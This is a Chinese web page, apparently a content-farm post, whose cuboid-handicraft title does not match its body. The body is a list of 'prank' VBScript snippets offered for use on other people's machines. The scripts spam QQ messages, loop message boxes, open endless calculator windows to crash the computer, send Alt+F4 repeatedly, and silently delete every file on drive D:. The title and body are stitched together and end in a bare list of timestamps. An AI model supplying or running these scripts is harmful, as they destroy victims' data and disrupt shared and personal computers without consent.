长方体怎么做手工?
2023-12-26 14:52:13
整人代码大全
整人代码大全,一起来看看吧。
01
打开好友的聊天对话框,然后记下在QQ里好友的昵称,把以下代码中xx替换一下,就可以自定义发送QQ信息到好友的次数(代码中数字10改下即可). xx.vbs=> =--------------------------------------- On Error Resume Next Dim wsh,ye set wsh=createobject("wscript.shell") for i=1 to 10 wscript.sleep 700 wsh.AppActivate("与 xx 聊天中") wsh.sendKeys "^v" wsh.sendKeys i wsh.sendKeys "%s" next wscript.quit
02
我就用这个程序放在学校图书馆查询书刊的机器上,好多人都那它没办法,哈哈。do msgbox "You are foolish!" loop
03
打开无数个计算器,直到死机。set wsh=createobject("wscript.shell") do wsh.run "calc" loop
04
删除D:\所有文件 dim WSHshell set WSHshell = wscript.createobject("wscript.shell") WSHshell.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
05
不断按下alt+f4 (开什么都关闭……) dim WSHshell set WSHshell = wscript.createobject("wscript.shell") while(1) WSHshell.SendKeys "%{F4}" loop
2023-12-26 14:52:13
2023-12-26 14:50:07
2023-12-25 16:30:47
2023-12-25 16:28:41
2023-12-25 16:26:35
2023-12-25 16:24:29
2023-12-25 16:22:23
2023-12-25 16:20:17
2023-12-25 16:18:11
2023-12-25 16:16:06
2023-12-25 16:14:00
2023-12-25 16:11:54
2023-12-25 01:11:23
2023-12-25 01:09:17
2023-12-25 01:07:11
2023-12-25 01:05:05
2023-12-25 01:02:59
2023-12-25 01:00:53
2023-12-25 00:58:47
2023-12-25 00:56:41